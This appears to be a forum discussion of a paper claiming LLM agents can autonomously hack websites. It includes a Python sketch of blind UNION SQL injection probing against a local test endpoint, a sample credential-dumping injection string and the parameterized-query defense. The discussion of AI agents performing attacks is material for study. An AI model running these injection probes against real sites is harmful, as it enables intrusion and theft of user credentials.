Control evaluations are less likely to work if our AIs become wildly superhuman in problematic domains (such as hacking, persuasion, etc.) before transformative AI.
Somewhat relevant new paper:
As LLMs have improved, so have their dual-use capabilities.
But many researchers think they serve as little more than a glorified Google. We show that LLM agents can autonomously hack websites, demonstrating that they can produce concrete harm.
Our LLM agents can perform complex hacks like blind SQL union attacks. These attacks can take 45 or more actions to perform and require the LLM to adapt its actions based on feedback.
We further show a strong scaling law, with only GPT-4 and GPT-3.5 successfully hacking websites (73% and 7% success rates, respectively). No open-source model successfully hacks websites.
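To make concrete why a blind union-based injection can run to dozens of actions: the attacker has to discover the shape of the underlying query by trial and error, one request per guess. The sketch below is illustrative only and is not the paper's agent or harness; it targets a hypothetical, deliberately vulnerable local test endpoint, and the URL, parameter name, and error heuristic are all assumptions made for illustration.

```python
import requests

# Hypothetical, deliberately vulnerable local test endpoint (an assumption for
# illustration; nothing here reflects the paper's actual setup).
TARGET = "http://localhost:8000/item"

def looks_like_error(resp: requests.Response) -> bool:
    """Crude feedback signal: the loop keys off error pages vs. normal pages."""
    return resp.status_code >= 500 or "error" in resp.text.lower()

def find_column_count(max_cols: int = 10):
    """Step 1: probe with ORDER BY n until the page breaks, revealing how many
    columns the original query selects. Each probe is one action."""
    for n in range(1, max_cols + 1):
        resp = requests.get(TARGET, params={"id": f"1 ORDER BY {n}--"})
        if looks_like_error(resp):
            return n - 1  # ORDER BY n failed, so the query has n-1 columns
    return None

def try_union_payloads(n_cols: int) -> None:
    """Step 2: cycle a marker string through the UNION SELECT column positions
    to find which columns are echoed back -- more blind trial and error."""
    for pos in range(n_cols):
        cols = ["NULL"] * n_cols
        cols[pos] = "'marker'"
        payload = f"1 UNION SELECT {', '.join(cols)}--"
        resp = requests.get(TARGET, params={"id": payload})
        if "marker" in resp.text:
            print(f"column {pos} is reflected in the page")

if __name__ == "__main__":
    n = find_column_count()
    if n:
        try_union_payloads(n)
```

Every probe is a separate request whose result determines the next guess, which is how the action count climbs into the dozens even for this textbook technique.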
Our LLM agents can perform complex hacks like blind SQL union attacks.
SQL union attacks are actually pretty simple and only work on poorly designed, typically older websites. Pretty much any modern website sanitizes or parameterizes its inputs, which makes such attacks impossible.
I have some doubts about the complex-actions bit too. My impression so far is that LLMs are still pretty bad at long-horizon tasks; they're not reliable enough to be usable at all. SQL union attacks are the ones that seem to take 45+ steps, so I'm guessing those steps are mostly just guessing lots of different query structures rather than real planning.
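On the sanitization point: the standard modern defense is to bind user input as a query parameter rather than concatenating it into the SQL string, which is why union injection only works against code written the old way. A minimal sketch using Python's standard-library sqlite3 module (the table, column names, and payload are made up for illustration):

```python
import sqlite3

# Toy in-memory database; table and column names are invented for this example.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
conn.execute("INSERT INTO items VALUES (1, 'widget')")

user_input = "1 UNION SELECT username, password FROM users--"

# Vulnerable pattern: user input spliced straight into the SQL string, so the
# UNION payload becomes part of the query. (Not executed here -- this toy DB
# has no users table -- but against real legacy code it would dump that table.)
vulnerable_query = f"SELECT id, name FROM items WHERE id = {user_input}"

# Safe pattern: the input is bound as a parameter, so the database treats the
# whole string as one opaque value, never as SQL.
rows = conn.execute(
    "SELECT id, name FROM items WHERE id = ?", (user_input,)
).fetchall()
print(rows)  # [] -- the payload matches nothing and injects nothing
```

The same pattern holds for prepared statements and ORMs in mainstream web frameworks, which is why the realistic attack surface is largely confined to older, hand-rolled query code.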